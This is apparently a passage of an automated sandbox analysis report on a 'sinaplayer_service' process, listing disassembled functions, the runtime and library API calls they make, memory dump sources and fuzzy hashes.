                                                                                                                                                                                                    • Instruction ID: 8b80bfd220dd1e48d682cdc55fd57360acfcbc85114b9cbb27c31a2e719c37c6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d177002f84bbbb0b50972382f266b4df84e21a4799b4364d8d78745a81ac6f86
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 333171B0A006099FDF26DFA9C984B7EBBF9EF45304F04C459E80697281DB79A905CF61
                                                                                                                                                                                                    Function 6C570969 Relevance: 10.6, APIs: 7, Instructions: 83stringCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,?,6C570A40,00000010), ref: 6C570951
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?,?,?,?,?,?,6C570A40,00000010), ref: 6C57099A
                                                                                                                                                                                                    • strlen.MSVCR120(?,?,?,?,?,?,?,6C570A40,00000010), ref: 6C5709ED
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,?,?,?,?,?,?,?,6C570A40,00000010), ref: 6C5709F8
                                                                                                                                                                                                    • _fwrite_nolock.MSVCR120(?,00000001,00000000,?,?,?,?,?,?,?,?,6C570A40,00000010), ref: 6C570A12
                                                                                                                                                                                                    • __ftbuf.LIBCMT ref: 6C570A1C
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,?,?,6C570A40,00000010), ref: 6C5A4F91
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __ftbuf_errno_fileno_fwrite_nolock_invalid_parameter_noinfo_lock_filestrlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2817190391-0
                                                                                                                                                                                                    • Opcode ID: a7a1def52927009d52e2c67ea4533aadafc1fcddf716ce87b9cb04dae0d0b9db
                                                                                                                                                                                                    • Instruction ID: 6e60f0e006146b3483c1cefa1c42acbf727d3d1ec05838d5bb79d82997761afb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7a1def52927009d52e2c67ea4533aadafc1fcddf716ce87b9cb04dae0d0b9db
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA210731905245DAEB209F768C40BAE35E1ABC1338F14831AE4349BFE0CB79C9818665
                                                                                                                                                                                                    Function 6C5808EE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __fltout2.LIBCMT ref: 6C580917
                                                                                                                                                                                                      • Part of subcall function 6C56B131: $I10_OUTPUT.MSVCR120(?,?,?,?,?,?,6C5D92B2,?,?,?,?,00000016,?,0000015D,?), ref: 6C56B170
                                                                                                                                                                                                      • Part of subcall function 6C56B131: strcpy_s.MSVCR120(6C5D92B2,?,?,?,?,?,?,?,?,6C5D92B2,?,?,?,?,00000016), ref: 6C56B190
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,?,?,?,6C5D94D6,00000000,?,6C5D94D6,?,?,?,?), ref: 6C5B1087
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,?,?,?,?,6C5D94D6,00000000,?,6C5D94D6,?,?,?,?), ref: 6C5B108E
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,?,?,?,?,6C5D94D6,00000000,?,6C5D94D6,?,?,?), ref: 6C5B109A
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,?,?,?,?,?,6C5D94D6,00000000,?,6C5D94D6,?,?,?), ref: 6C5B10A1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$I10___fltout2strcpy_s
                                                                                                                                                                                                    • String ID: -
                                                                                                                                                                                                    • API String ID: 2050506888-2547889144
                                                                                                                                                                                                    • Opcode ID: d4e6c920f626bdc1dd89bbd66535d76c97283a829ba24c33941dd2f75549abff
                                                                                                                                                                                                    • Instruction ID: 04bcb2a94792aeb5d6a566af9a3d30244aea7b13aa3a53850990eb1b2287e433
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4e6c920f626bdc1dd89bbd66535d76c97283a829ba24c33941dd2f75549abff
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2921C272A01159EFDB04DF79CC81AEFB7A8DF89218F044569E925A7A50EB30DC048BA1
                                                                                                                                                                                                    Function 6C582E0C Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __doserrno.MSVCR120(6C582EB0,00000010), ref: 6C582E02
                                                                                                                                                                                                    • __doserrno.MSVCR120(6C582EB0,00000010), ref: 6C5AF011
                                                                                                                                                                                                    • _errno.MSVCR120(6C582EB0,00000010), ref: 6C5AF018
                                                                                                                                                                                                    • _errno.MSVCR120(6C582EB0,00000010), ref: 6C5AF05D
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6C582EB0,00000010), ref: 6C5AF068
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2315031519-0
                                                                                                                                                                                                    • Opcode ID: c32b85972d94138f5a047ea826af32df1eb805f1babc560fa8dc97ec6f71635a
                                                                                                                                                                                                    • Instruction ID: 90be30cef7698257cd28648979931a3baead3a392c79a980415f20aa73d1bf50
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c32b85972d94138f5a047ea826af32df1eb805f1babc560fa8dc97ec6f71635a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34212931507621DAD7159F6A8C806BD7AA0AFC2328F600719D4725BFE0CB748D4647BA
                                                                                                                                                                                                    Function 00380C20 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,00000000,?,6C6C52C0,y`8,00380D3F,?,00000000,y`8,?,00000001,?,00386079,00000000,00000005), ref: 00380C3A
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,00000000,?,6C6C52C0,y`8,00380D3F,?,00000000,y`8,?,00000001,?,00386079,00000000,00000005), ref: 00380C5E
                                                                                                                                                                                                    • memcpy.MSVCR120(00000000,00386079,?,00000000,?,6C6C52C0,y`8,00380D3F,?,00000000,y`8,?,00000001,?,00386079,00000000), ref: 00380C9E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xlength_error@std@@Xout_of_range@std@@memcpy
                                                                                                                                                                                                    • String ID: invalid string position$string too long$y`8
                                                                                                                                                                                                    • API String ID: 4248180022-475471333
                                                                                                                                                                                                    • Opcode ID: 195b992c1ca72e0187e6149f71140507c237d1efd6c402b23d66004cdc773a57
                                                                                                                                                                                                    • Instruction ID: cb7bbdb4a3bc9df929f2385dfe9437710f36eb112d775e9c7e61f96cd7541891
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 195b992c1ca72e0187e6149f71140507c237d1efd6c402b23d66004cdc773a57
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D21C0313007049FDB29AF6CD985A5AB7B9EB40750B100A6EE846CB381C771E848C798
                                                                                                                                                                                                    Function 003887C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 003881D0: ?AsUTF8Unsafe@FilePath@base@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.BASE(?,8285FFAB,?,0039B190,000000FF,?,00388981,?,8285FFAB,?,?,00000001,?,00000001,00000000,0039A9DB), ref: 00388202
                                                                                                                                                                                                      • Part of subcall function 003881D0: ??1CallbackBase@internal@base@@IAE@XZ.BASE(0000010D,00000000,?,?,?,?,?,?,00388981,?,8285FFAB,?,?), ref: 0038823D
                                                                                                                                                                                                      • Part of subcall function 003881D0: ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,?,00388981), ref: 0038824C
                                                                                                                                                                                                      • Part of subcall function 00387AE0: ??2@YAPAXI@Z.MSVCR120(00000018), ref: 00387B0F
                                                                                                                                                                                                      • Part of subcall function 00387AE0: ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE(?), ref: 00387B2A
                                                                                                                                                                                                      • Part of subcall function 00387AE0: ??0CallbackBase@internal@base@@QAE@ABV012@@Z.BASE(?), ref: 00387B4E
                                                                                                                                                                                                      • Part of subcall function 00387AE0: ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000,?), ref: 00387B65
                                                                                                                                                                                                      • Part of subcall function 00387A30: ??2@YAPAXI@Z.MSVCR120(0000002C), ref: 00387A5F
                                                                                                                                                                                                      • Part of subcall function 00387A30: ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE(?), ref: 00387A7A
                                                                                                                                                                                                      • Part of subcall function 00387A30: ??0FilePath@base@@QAE@ABV01@@Z.BASE(?), ref: 00387A9E
                                                                                                                                                                                                      • Part of subcall function 00387A30: ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000,?), ref: 00387ABD
                                                                                                                                                                                                    • ?GetProgramCounter@tracked_objects@@YAPBXXZ.BASE(00000000,00000000,?,?,?,?,?,8285FFAB), ref: 00388848
                                                                                                                                                                                                    • ??0Location@tracked_objects@@QAE@PBD0HPBX@Z.BASE(net::FileStream::Context::OpenAsync,network_change\file_stream_context.cc,0000004D,00000000,?,?,?,?,?,8285FFAB), ref: 0038885E
                                                                                                                                                                                                      • Part of subcall function 00387DE0: ??2@YAPAXI@Z.MSVCR120(00000018,8285FFAB,?,?,0039B128,000000FF,?,0038886B,?,00000000,?,?,?,?,?,8285FFAB), ref: 00387E09
                                                                                                                                                                                                      • Part of subcall function 00387DE0: ?PostTaskAndReply@TaskRunner@base@@QAE_NABVLocation@tracked_objects@@ABV?$Callback@$$A6AXXZ@2@1@Z.BASE(0038886B,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF), ref: 00387E84
                                                                                                                                                                                                      • Part of subcall function 00387DE0: ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038886B,?), ref: 00387E99
                                                                                                                                                                                                      • Part of subcall function 00387DE0: ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038886B,?), ref: 00387EA2
                                                                                                                                                                                                      • Part of subcall function 00387DE0: ??3@YAXPAX@Z.MSVCR120(000000FF,?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038886B), ref: 00387EA7
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,8285FFAB), ref: 0038887B
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,8285FFAB), ref: 00388887
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • network_change\file_stream_context.cc, xrefs: 00388851
                                                                                                                                                                                                    • net::FileStream::Context::OpenAsync, xrefs: 00388856
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@internal@base@@Callback$??2@$??3@Base@12@@Base@subtle@base@@BindCountedFileLocation@tracked_objects@@Path@base@@SafeStateTaskThread$Callback@$$Counter@tracked_objects@@D@2@@std@@D@std@@PostProgramReply@Runner@base@@U?$char_traits@Unsafe@V012@@V01@@V?$allocator@V?$basic_string@Z@2@1@
                                                                                                                                                                                                    • String ID: net::FileStream::Context::OpenAsync$network_change\file_stream_context.cc
                                                                                                                                                                                                    • API String ID: 3746277702-641225901
                                                                                                                                                                                                    • Opcode ID: 3715c7d507a244b159b1ba9cf59165dbd8a5021fecb903b17133c7524a87755f
                                                                                                                                                                                                    • Instruction ID: 626f9cebeada63aba5b4b14b6d0a192caa61330bb1339747f64cf6667bc41c1a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3715c7d507a244b159b1ba9cf59165dbd8a5021fecb903b17133c7524a87755f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0215E72904248AFDB02DF98DC45AEFBBBCEB05714F10415AF825A7281D775AA04CBA1
                                                                                                                                                                                                    Function 00388CD0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00387B90: ??2@YAPAXI@Z.MSVCR120(00000018), ref: 00387BBF
                                                                                                                                                                                                      • Part of subcall function 00387B90: ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 00387BDA
                                                                                                                                                                                                      • Part of subcall function 00387B90: ??0CallbackBase@internal@base@@QAE@ABV012@@Z.BASE(?), ref: 00387BFE
                                                                                                                                                                                                      • Part of subcall function 00387B90: ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000), ref: 00387C15
                                                                                                                                                                                                      • Part of subcall function 003878E0: ??2@YAPAXI@Z.MSVCR120(00000020), ref: 0038790F
                                                                                                                                                                                                      • Part of subcall function 003878E0: ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 0038792A
                                                                                                                                                                                                      • Part of subcall function 003878E0: ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000), ref: 0038796B
                                                                                                                                                                                                    • ?GetProgramCounter@tracked_objects@@YAPBXXZ.BASE(00000000,00000000,?,?,?,?,?,8285FFAB), ref: 00388D52
                                                                                                                                                                                                    • ??0Location@tracked_objects@@QAE@PBD0HPBX@Z.BASE(net::FileStream::Context::SeekAsync,network_change\file_stream_context.cc,00000085,00000000,?,?,?,?,?,8285FFAB), ref: 00388D6B
                                                                                                                                                                                                      • Part of subcall function 00387D00: ??2@YAPAXI@Z.MSVCR120(00000010,8285FFAB,?,?,0039B128,000000FF,?,0038842B,?,00000000,?,?,?,8285FFAB), ref: 00387D29
                                                                                                                                                                                                      • Part of subcall function 00387D00: ?PostTaskAndReply@TaskRunner@base@@QAE_NABVLocation@tracked_objects@@ABV?$Callback@$$A6AXXZ@2@1@Z.BASE(0038842B,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF), ref: 00387D9D
                                                                                                                                                                                                      • Part of subcall function 00387D00: ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038842B,?), ref: 00387DB2
                                                                                                                                                                                                      • Part of subcall function 00387D00: ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038842B,?), ref: 00387DBB
                                                                                                                                                                                                      • Part of subcall function 00387D00: ??3@YAXPAX@Z.MSVCR120(000000FF,?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038842B), ref: 00387DC0
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,8285FFAB), ref: 00388D88
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,8285FFAB), ref: 00388D94
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • network_change\file_stream_context.cc, xrefs: 00388D5E
                                                                                                                                                                                                    • net::FileStream::Context::SeekAsync, xrefs: 00388D63
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@internal@base@@Callback$??2@$Base@12@@Base@subtle@base@@BindCountedLocation@tracked_objects@@SafeStateTaskThread$??3@Callback@$$Counter@tracked_objects@@PostProgramReply@Runner@base@@V012@@Z@2@1@
                                                                                                                                                                                                    • String ID: net::FileStream::Context::SeekAsync$network_change\file_stream_context.cc
                                                                                                                                                                                                    • API String ID: 4200212630-3437824903
                                                                                                                                                                                                    • Opcode ID: 307a096f8c2e39a6a185ce755317de2be1c65d18ee34b4c347dc685089c9615c
                                                                                                                                                                                                    • Instruction ID: fe2a721bc83b5345708837f68be26f481ffb8472e979fee0e893b85594656c39
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 307a096f8c2e39a6a185ce755317de2be1c65d18ee34b4c347dc685089c9615c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C217F7290420CAFCB02DF94DD45ADFBBBCEB09714F10426AE821E7281D7759A04CBA1
                                                                                                                                                                                                    Function 6C57CABB Relevance: 10.6, APIs: 7, Instructions: 72COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32(00000000,?,?,6C57CAB6), ref: 6C57CAC0
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,6C57CAB6), ref: 6C57CAF4
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000000,?,?,?,?,6C57CAB6), ref: 6C57CB02
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,00000000,00000000,?,?,?,?,6C57CAB6), ref: 6C57CB1A
                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,6C57CAB6), ref: 6C57CB29
                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,6C57CAB6), ref: 6C57CB39
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnvironmentStrings$ByteCharFreeMultiWide$_malloc_crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3279498665-0
                                                                                                                                                                                                    • Opcode ID: f8600b03344b3fa489423ebc163ff1ae60515d44895d6fe210464c18eb8035db
                                                                                                                                                                                                    • Instruction ID: 2cb42e96aa3f18d0f56c389c9ef516095342426af87adacb69cc158308d064e2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8600b03344b3fa489423ebc163ff1ae60515d44895d6fe210464c18eb8035db
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E119B76B05215BFEB306AB64C88C3B7B7CEB92259350092AFC0DD3540EB61DC8182B5
                                                                                                                                                                                                    Function 0038A6C0 Relevance: 10.6, APIs: 7, Instructions: 70COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Lock@LockImpl@internal@base@@QAEXXZ.BASE(8285FFAB,00000000,6C6C56E0,00000000), ref: 0038A6FC
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 0038A714
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038A72B
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038A747
                                                                                                                                                                                                    • ?Unlock@LockImpl@internal@base@@QAEXXZ.BASE ref: 0038A755
                                                                                                                                                                                                    • ??1LockImpl@internal@base@@QAE@XZ.BASE ref: 0038A761
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038A770
                                                                                                                                                                                                      • Part of subcall function 0038E840: EnterCriticalSection.KERNEL32(00000000,8285FFAB,?,?,00000000,00000000,00000000,0039BCE1,000000FF), ref: 0038E873
                                                                                                                                                                                                      • Part of subcall function 0038E840: LeaveCriticalSection.KERNEL32(00000000), ref: 0038E87E
                                                                                                                                                                                                      • Part of subcall function 0038E840: DisconnectNamedPipe.KERNEL32(?), ref: 0038E887
                                                                                                                                                                                                      • Part of subcall function 0038E840: Sleep.KERNEL32(0000000A), ref: 0038E8A1
                                                                                                                                                                                                      • Part of subcall function 0038E840: UnregisterWaitEx.KERNEL32(?,000000FF), ref: 0038E8B1
                                                                                                                                                                                                      • Part of subcall function 0038E840: CloseHandle.KERNEL32(?), ref: 0038E8C5
                                                                                                                                                                                                      • Part of subcall function 0038E840: ??3@YAXPAX@Z.MSVCR120(?,00000001), ref: 0038E8EF
                                                                                                                                                                                                      • Part of subcall function 0038E840: ReleaseMutex.KERNEL32(?), ref: 0038E90C
                                                                                                                                                                                                      • Part of subcall function 0038E840: CloseHandle.KERNEL32(?), ref: 0038E915
                                                                                                                                                                                                      • Part of subcall function 0038E840: CloseHandle.KERNEL32(?), ref: 0038E922
                                                                                                                                                                                                      • Part of subcall function 0038E840: DeleteCriticalSection.KERNEL32(00000000), ref: 0038E925
                                                                                                                                                                                                      • Part of subcall function 0038E840: ??3@YAXPAX@Z.MSVCR120(?), ref: 0038E93E
                                                                                                                                                                                                      • Part of subcall function 0038E840: ??3@YAXPAX@Z.MSVCR120(?), ref: 0038E94F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@$CloseCriticalHandleImpl@internal@base@@LockSection$DeleteDisconnectEnterLeaveLock@MutexNamedPipeReleaseSleepUnlock@UnregisterWait
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1533647037-0
                                                                                                                                                                                                    • Opcode ID: 7871e681c44bacf4f4edd7089f7f481c4eb115c82fc70042aab4614f13f60944
                                                                                                                                                                                                    • Instruction ID: 11cbd14ba194c68695da526a30cdfb4d62a36446d8a63f03b83a2a33217a0e18
